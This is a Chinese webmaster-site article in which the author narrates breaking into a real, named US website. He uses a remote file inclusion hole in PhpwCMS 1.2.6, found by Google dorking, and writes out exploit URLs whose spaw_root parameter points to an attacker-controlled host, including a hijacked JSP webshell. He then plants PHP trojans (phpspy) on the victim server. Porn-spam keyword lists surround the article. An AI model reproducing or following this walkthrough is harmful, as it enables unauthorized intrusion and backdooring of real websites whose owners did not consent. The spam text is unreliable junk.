精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

17站長網

17站長網 首頁 安全 入侵防御 查看內容

通過利用文件包含漏洞對網站 進行入侵實驗!

2022-9-26 10:51| 查看: 2404 |來源: 互聯網

一、看見漏洞公告   最近想學習一下文件包含漏洞,在無意中看見了關于文件包含的漏洞公告。大致的意思是這樣的,PhpwCMS 1.2.6系統的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php
一、看見漏洞公告

  最近想學習一下文件包含漏洞,在無意中看見了關于文件包含的漏洞公告。大致的意思是這樣的,PhpwCMS 1.2.6系統的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php

  include/inc_ext/spaw/dialogs/a.php

  include/inc_ext/spaw/dialogs/colorpicker.php

  include/inc_ext/spaw/dialogs/confirm.php

  include/inc_ext/spaw/dialogs/img.php

  include/inc_ext/spaw/dialogs/img_library.php

  include/inc_ext/spaw/dialogs/td.php

  文件中的$spaw_root的沒有過濾的情況下,包含’**class/lang.class.php’。具體的代碼公告中沒給出來。可以利用下面的url利用此漏洞,http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/,其中website1是有漏洞的網站,website2是攻擊的網站,website2所在的目錄下有class/lang.class.php文件。

  二、學習的第一天

  馬上行動,我用google搜索inurl:"phpwcms/index.php?id=",搜索到54,800多項結果,基本上都是國外的。看來這次發了,這次國外的wenshell肯定是一大堆了。呵呵……,嘿嘿……隨便點擊一個網站,是美國的:http://arena-sv.jans-webdesign.com,不知道這個網站有沒有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/檢測,當然http://www.baidu.com/class/lang.class.php是不存在的,這時頁面顯示如圖一所示,提示沒有找到頁面。這表明了這個網站存在文件包含漏洞,象這樣的有漏洞的網站隨便點擊一個就是。

  檢測出有文件包含漏洞

  現在開始利用這個漏洞,在我的支持asp網站根目錄建一個class的目錄,在class里面建lang.class.php文件。但是當我用瀏覽器瀏覽http://www.xxxx.xx/class/lang.class.php的時候,提示找不到文件。難道是我的網站所在的服務器沒設置好嗎?我試著找到了幾個webshell,瀏覽的時候還是出現找不到文件的問題。

三、學習的第二天

  去搜索的發現有漏洞的網站變得比較少了,大部分的網站都被漏洞補了,還有一部分美國的網站上被掛了一些與反戰爭有關的圖片或者一些國旗。還好的是昨天的哪個網站沒有被人家黑掉,還有機會學習。我在無意中得到了jsp的wenshell,試著寫了一個php文件,在瀏覽器瀏覽的時候出現的是源文件。看來現在現在可以利用這個jsp的webshell來作跳板。

  在webshell里面建一個class的文件夾,然后在class目錄里面上傳一個lang.class.php空文件,在文件里面寫上.在瀏覽器上瀏覽http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.php, 顯示的就是, 然后提交http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/,/是/的意思。

  php環境信息

  編輯lang.class.php的文件,先寫了一個phpspy。但是登陸webshell的后,頁面轉到其他的頁面。還是先傳一可以上傳的文件的馬兒吧,傳了一個國外的php木馬,木馬的功能很的大,瀏覽http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/。

  包含的國外php木馬

  但是這個國外的php馬還是上傳一個經過修改的phpspy吧,用著舒服一點,上傳得文件改為了imge.php,現在訪問http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/imge.php?cuit=6305,登陸后一臺webshell就在我們的眼前了。權限也不錯,但是由于是linux系統,也不知道怎么去提權,還是再放一下吧!

  phpspy上傳成功

  四、學習的第三天

  對linux下的提權一點都不了解,沒辦法只有尋求幫助了。Jinsdb師兄叫我去一些好的網站找一下exp看看,他還告訴我了上次在我的網站中的php文件瀏覽的時候是找不到文件的原因:因為我的系統是2003的,所以要在IIS的ISAPI 篩選器中加.php后綴,在xp下訪問php文件直接就可以瀏覽。看來上次我得到的服務器基本上是2003的。

  看來這次的學習也蠻有意義的!發現一點,國外的網站的管理人員比較重視安全。在出現漏洞的第二天,很多網站都把漏洞補了,還有的網站被入侵后能馬上發現,并及時清除了webshell。
本文最后更新于 2022-9-26 10:51,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 黑人巨大vs北条麻妃在线 | 久久精品视频国产 | 成人午夜在线观看国产 | 小明看看主页 | 亚洲拍拍| 国产成人精品自拍 | 国产亚洲综合一区二区在线 | 麻豆久久 | 在线播放国产麻豆 | 久草久热 | 成年人午夜 | 欧美日韩国产最新一区二区 | 91大神成人偷拍在线观看 | 亚洲视频一区在线播放 | 午夜色a大片在线观看免费 午夜色图 | 在线国产一区二区 | 国内免费一区二区三区视频 | 日日草夜夜操 | 涩色网 | 2019理论国产一级中字 | 欧美日韩亚洲另类人人澡 | 久久久网站亚洲第一 | 亚洲成人精品在线 | 国产精品vs欧美精品 | 亚洲综合自拍 | 久久er国产精品免费观看8 | 精品亚洲一区二区在线播放 | 精品一久久香蕉国产线看观看下 | 久久成人小视频 | 久久er热这里只有精品23 | 国产精品巨乳 | 日本人69视频在线观看 | 免费黄在线 | 最新国产精品久久精品 | 欧美三级aaa| 亚洲欧洲高清有无 | 国产高清三级 | 成年人在线播放视频 | 久久综合精品国产一区二区三区 | 黄色片免费在线播放 | 黄网站免费观看 |